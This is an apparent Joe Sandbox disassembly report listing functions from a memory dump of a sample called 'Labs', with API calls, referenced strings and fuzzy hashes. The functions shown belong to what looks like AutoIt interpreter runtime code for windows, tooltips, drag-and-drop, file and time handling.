Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 450f8487c759e33080898960fb923ea9ae2a5544ed1ebf663c9aa97928dd55f1
Instruction ID: a8d2d431c5770a436a186426f4d03463ac7f049f9bac59df5078a84a76ee4508
Opcode Fuzzy Hash: 450f8487c759e33080898960fb923ea9ae2a5544ed1ebf663c9aa97928dd55f1
Instruction Fuzzy Hash: F8515D70900709EFDB219FA8CE8AF6EBBB5FF44705F00491CE55AA25A0DB79A914CF50

Function 007FA7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007FA87E
DestroyWindow.USER32(00000000,?), ref: 007FA8F8

Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007FA972
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007FA994
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007FA9A7
DestroyWindow.USER32(00000000), ref: 007FA9C9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00770000,00000000), ref: 007FAA00
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007FAA19
GetDesktopWindow.USER32 ref: 007FAA32
GetWindowRect.USER32(00000000), ref: 007FAA39
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007FAA51
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007FAA69

Part of subcall function 007729AB: GetWindowLongW.USER32(?,000000EB), ref: 007729BC

Strings

0, xrefs: 007FA894
tooltips_class32, xrefs: 007FA96B, 007FA9F9

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 8a10233b4010c92ea8f453682d345aad2165d839b46a0f911446552b748c3c9f
Instruction ID: b3972d50ff303b140d1e54c5a74cc89cd2a8c22c3c324524e8a9903451be0838
Opcode Fuzzy Hash: 8a10233b4010c92ea8f453682d345aad2165d839b46a0f911446552b748c3c9f
Instruction Fuzzy Hash: 5C7189B1150208AFD721CF28C849F7A77E9FB88300F04492DFA89973A1D779E916DB56

Function 007FCCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3

DragQueryPoint.SHELL32(?,?), ref: 007FCCCF

Part of subcall function 007FB1A9: ClientToScreen.USER32(?,?), ref: 007FB1D2
Part of subcall function 007FB1A9: GetWindowRect.USER32(?,?), ref: 007FB248
Part of subcall function 007FB1A9: PtInRect.USER32(?,?,007FC6BC), ref: 007FB258

SendMessageW.USER32(?,000000B0,?,?), ref: 007FCD38
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007FCD43
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007FCD66
_wcscat.LIBCMT ref: 007FCD96
SendMessageW.USER32(?,000000C2,00000001,?), ref: 007FCDAD
SendMessageW.USER32(?,000000B0,?,?), ref: 007FCDC6
SendMessageW.USER32(?,000000B1,?,?), ref: 007FCDDD
SendMessageW.USER32(?,000000B1,?,?), ref: 007FCDFF
DragFinish.SHELL32(?), ref: 007FCE06
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 007FCEF9

Strings

@GUI_DRAGID, xrefs: 007FCE71
@GUI_DROPID, xrefs: 007FCE26
@GUI_DRAGFILE, xrefs: 007FCEA8

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 2eb98d924064187a34612e0efa504deba756e83832751e88e79d3aff4539e761
Instruction ID: c2664d9e90ed52d02c3245a94a1196d44b8fafc9ea3b83b769d949577db39923
Opcode Fuzzy Hash: 2eb98d924064187a34612e0efa504deba756e83832751e88e79d3aff4539e761
Instruction Fuzzy Hash: 37617F71108304AFC711EF50DC89E6FBBE8FF84350F400A2DF6A5922A1DB759A49CB52

Function 007D82D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 007D831A
VariantCopy.OLEAUT32(00000000,?), ref: 007D8323
VariantClear.OLEAUT32(00000000), ref: 007D832F
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007D841D
__swprintf.LIBCMT ref: 007D844D
VarR8FromDec.OLEAUT32(?,?), ref: 007D8479
VariantInit.OLEAUT32(?), ref: 007D852A
SysFreeString.OLEAUT32(?), ref: 007D85BE
VariantClear.OLEAUT32(?), ref: 007D8618
VariantClear.OLEAUT32(?), ref: 007D8627
VariantInit.OLEAUT32(00000000), ref: 007D8665

Strings

Default, xrefs: 007D84DA
%4d%02d%02d%02d%02d%02d, xrefs: 007D8447

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 730379b8e0bb80834e1d5b159047e067a516316dad1f43baeb73f0d69cf80324
Instruction ID: a83e50969b77b4d089c47d2ecf2fba027d3547b4b808e179b8bd19f6f456892c
Opcode Fuzzy Hash: 730379b8e0bb80834e1d5b159047e067a516316dad1f43baeb73f0d69cf80324
Instruction Fuzzy Hash: 9CD1D171604515EBDBA09F69D888B6EB7B4FF04B00F188557E419AB381DF38ED40DBA2

Function 007F49CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007F4A61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007F4AAC

Strings

EXPAND, xrefs: 007F4B5E
GETITEMCOUNT, xrefs: 007F4B8E
COLLAPSE, xrefs: 007F4AF2
GETTOTALCOUNT, xrefs: 007F4A93
SELECT, xrefs: 007F4C5D
GETSELECTED, xrefs: 007F4BBC
UNCHECK, xrefs: 007F4C88
ISCHECKED, xrefs: 007F4C2F
GETTEXT, xrefs: 007F4BFF
CHECK, xrefs: 007F4ACC
EXISTS, xrefs: 007F4B15

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: ac496718d02e2cf59f870744930a61241445243b0e6f34d01b9813eefbdc8db1
Instruction ID: 03e60bb308e52ad6f9044c1e2e313743c000c1c9e2c9137d6ef84b9491149c0b
Opcode Fuzzy Hash: ac496718d02e2cf59f870744930a61241445243b0e6f34d01b9813eefbdc8db1
Instruction Fuzzy Hash: 51918970200715DFCB14EF20C855A7AB7A1BF94354F10885CFA965B3A2CB38ED4ACB92

Function 007FBE70 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007FBF26
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,007F97E7), ref: 007FBF82
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007FBFBB
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007FBFFE
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007FC035
FreeLibrary.KERNEL32(?), ref: 007FC041
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007FC051
DestroyIcon.USER32(?,?,?,?,?,007F97E7), ref: 007FC060
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007FC07D
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007FC089

Part of subcall function 0079312D: __wcsicmp_l.LIBCMT ref: 007931B6

Strings

.icl, xrefs: 007FBE9C
.dll, xrefs: 007FBEDF
.exe, xrefs: 007FBEBC

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 5a710edfbb141c65a9cc30919d0e9c466881aab0ee61322cfccaef890d1185a0
Instruction ID: 482a72a68e8bf4c98d85521578ded259146a445d22ac1e5f50fa73caa56eb017
Opcode Fuzzy Hash: 5a710edfbb141c65a9cc30919d0e9c466881aab0ee61322cfccaef890d1185a0
Instruction Fuzzy Hash: F861FF7160021CFEEB15DF64DD85BBE77A8FB08710F104209FA15D62D1DB79AA81DBA0

Function 007DE25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 007DE31F
SystemTimeToFileTime.KERNEL32(?,?), ref: 007DE32F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007DE33B
__wsplitpath.LIBCMT ref: 007DE399
_wcscat.LIBCMT ref: 007DE3B1
_wcscat.LIBCMT ref: 007DE3C3
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007DE3D8
SetCurrentDirectoryW.KERNEL32(?), ref: 007DE3EC
SetCurrentDirectoryW.KERNEL32(?), ref: 007DE41E
SetCurrentDirectoryW.KERNEL32(?), ref: 007DE43F
_wcscpy.LIBCMT ref: 007DE44B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 007DE48A

Strings

*.*, xrefs: 007DE445

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 702e8acddc4ab1acc41cb96e0a9c5294cb76a21a2ad181262061aeda234cbd7f
Instruction ID: faff6061c0f7c0c0721907221ac1108f60481ade9102d2ecc0471562f7736a1d
Opcode Fuzzy Hash: 702e8acddc4ab1acc41cb96e0a9c5294cb76a21a2ad181262061aeda234cbd7f
Instruction Fuzzy Hash: FF6139725047459FCB11EF60C848A9EB3F8BF89310F04891EF98987251DB39E945CB92

Function 007DA27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007DA2C2

Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007DA2E3
__swprintf.LIBCMT ref: 007DA33C
__swprintf.LIBCMT ref: 007DA355
_wprintf.LIBCMT ref: 007DA3FC
_wprintf.LIBCMT ref: 007DA41A

Strings

"%s" (%d) : ==> %s:, xrefs: 007DA415
Error: , xrefs: 007DA3C4
Incorrect parameters to object property !, xrefs: 007DA39E
^ ERROR , xrefs: 007DA391
"%s" (%d) : ==> %s:%s%s, xrefs: 007DA3F7
Line %d (File "%s"):, xrefs: 007DA336, 007DA34F

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 4e0d558ce69c0ddc5eca318db849e61ac8e786cb6e5e092da6517e9e70139d03
Instruction ID: 6fe24bf3e8ac3bbf9c94635811f1e480c60819c7c8ff8bda0650fec2cc3b3114
Opcode Fuzzy Hash: 4e0d558ce69c0ddc5eca318db849e61ac8e786cb6e5e092da6517e9e70139d03
Instruction Fuzzy Hash: 9051AC71940219EACF24FBE0DD4AEEEB779BF04340F500166F405A2192EB392E5ACB61

Function 007D0065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,007BF8B8,00000001,0000138C,00000001,00000001,00000001,?,007E3FF9,00000001), ref: 007D009A
LoadStringW.USER32(00000000,?,007BF8B8,00000001), ref: 007D00A3

Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77

GetModuleHandleW.KERNEL32(00000000,00837310,?,00000FFF,?,?,007BF8B8,00000001,0000138C,00000001,00000001,00000001,?,007E3FF9,00000001,00000001), ref: 007D00C5
LoadStringW.USER32(00000000,?,007BF8B8,00000001), ref: 007D00C8
__swprintf.LIBCMT ref: 007D0118
__swprintf.LIBCMT ref: 007D0129
_wprintf.LIBCMT ref: 007D01D2
MessageBoxW.USER32(00000000,?,?,00011010), ref: 007D01E9

Strings

Line %d:, xrefs: 007D0123
Error: , xrefs: 007D01A0
^ ERROR, xrefs: 007D017E
Line %d (File "%s"):, xrefs: 007D0112
%s (%d) : ==> %s: %s %s, xrefs: 007D01CD

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: fecea5b55a365d5ace96353518dab55a18a634ecb3f9764f50d6a5396c46a4be
Instruction ID: 0bbc4d95dfd84d5bd7a4d6c5d9d4b681df060981c1969a569e16b4ebc93ed593
Opcode Fuzzy Hash: fecea5b55a365d5ace96353518dab55a18a634ecb3f9764f50d6a5396c46a4be
Instruction Fuzzy Hash: 29413F72840219EACF14FBE0DD9AEEEB77DEF14340F900155F505A2192DA396F4ACBA1

Function 007DA995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC

CharLowerBuffW.USER32(?,?), ref: 007DAA0E
GetDriveTypeW.KERNEL32 ref: 007DAA5B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007DAAA3
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007DAADA
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007DAB08

Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B

Strings

type cdaudio alias cd wait, xrefs: 007DAA86
close, xrefs: 007DAA14
close cd wait, xrefs: 007DAAF3
open , xrefs: 007DAA6A
open, xrefs: 007DAA35
set cd door , xrefs: 007DAAA9
wait, xrefs: 007DAAC5
closed, xrefs: 007DAA22, 007DAA2B

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 5d6d6675abf976b4bdd359f1d4a59e7484774c40b7878e4165eb49dc73415c0f
Instruction ID: d7ca05c1da3260f2662f1152f2f05840dcda19c10f0d0814750bbddd97110a59
Opcode Fuzzy Hash: 5d6d6675abf976b4bdd359f1d4a59e7484774c40b7878e4165eb49dc73415c0f
Instruction Fuzzy Hash: 47514971204205EFC700EF20D88596AB3F8FF94758F50896DF895972A1DB39AD0ACB92

Function 007DA832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007DA852
__swprintf.LIBCMT ref: 007DA874
CreateDirectoryW.KERNEL32(?,00000000), ref: 007DA8B1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007DA8D6
_memset.LIBCMT ref: 007DA8F5
_wcsncpy.LIBCMT ref: 007DA931
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007DA966
CloseHandle.KERNEL32(00000000), ref: 007DA971
RemoveDirectoryW.KERNEL32(?), ref: 007DA97A
CloseHandle.KERNEL32(00000000), ref: 007DA984

Strings

\, xrefs: 007DA88A
:, xrefs: 007DA895
\??\%s, xrefs: 007DA86E

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: e3c6526f374e343ecae185e344c54876620da8a1d7ccda66d5c82b7e96870217
Instruction ID: b1bf7a3c3a6e5a8305ae805fc7d560bba8e475aabbfe62f1c3b8dd58dbdfa4dc
Opcode Fuzzy Hash: e3c6526f374e343ecae185e344c54876620da8a1d7ccda66d5c82b7e96870217
Instruction Fuzzy Hash: AB3172B1900219BBDB219FA0DC49FEB77BCFF89700F1041A6F909D6160EB7496458B25

Function 007FC0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,007F982C,?,?), ref: 007FC0C8
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC0DF
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC0EA
CloseHandle.KERNEL32(00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC0F7
GlobalLock.KERNEL32(00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC100
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC10F
GlobalUnlock.KERNEL32(00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC118
CloseHandle.KERNEL32(00000000,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC11F
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,007F982C,?,?,00000000,?), ref: 007FC130
OleLoadPicture.OLEAUT32(?,00000000,00000000,00803C7C,?), ref: 007FC149
GlobalFree.KERNEL32(00000000), ref: 007FC159
GetObjectW.GDI32(00000000,00000018,?), ref: 007FC17D
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 007FC1A8
DeleteObject.GDI32(00000000), ref: 007FC1D0
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007FC1E6

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: c9bb940a85701a31db793b701cbb132586398a8b192edf00665ebef09e442321
Instruction ID: 15a4c91af5414fb111b0826c2f38e6d30d2910c93451207f60a79cdcd9e4ddda
Opcode Fuzzy Hash: c9bb940a85701a31db793b701cbb132586398a8b192edf00665ebef09e442321
Instruction Fuzzy Hash: 3641497160020CEFDB629F64DD88EAA7BB9FF89711F104058FA09E7260DB349941DF60

Function 007DDEDC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 007DE053
_wcscat.LIBCMT ref: 007DE06B
_wcscat.LIBCMT ref: 007DE07D
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007DE092
SetCurrentDirectoryW.KERNEL32(?), ref: 007DE0A6
GetFileAttributesW.KERNEL32(?), ref: 007DE0BE
SetFileAttributesW.KERNEL32(?,00000000), ref: 007DE0D8
SetCurrentDirectoryW.KERNEL32(?), ref: 007DE0EA

Strings

*.*, xrefs: 007DE129

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: e9a48bd55bd8c765bbc1ce14aa1ded0cef34d9f78740f565d246ac40da81e0bf
Instruction ID: 9f0794e43504cba477582d37d12ce725700e7ed7c949bde67b531072a8a80d51
Opcode Fuzzy Hash: e9a48bd55bd8c765bbc1ce14aa1ded0cef34d9f78740f565d246ac40da81e0bf
Instruction Fuzzy Hash: 97816F716043459FCB34EF64C84496AB7F8AB99310F18882BF49AC7351E738ED45CB52

Function 007FC854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007FC8A4
GetFocus.USER32 ref: 007FC8B4
GetDlgCtrlID.USER32(00000000), ref: 007FC8BF
_memset.LIBCMT ref: 007FC9EA
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007FCA15
GetMenuItemCount.USER32(?), ref: 007FCA35
GetMenuItemID.USER32(?,00000000), ref: 007FCA48
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007FCA7C
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007FCAC4
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007FCAFC
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 007FCB31

Strings

0, xrefs: 007FC9E2

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
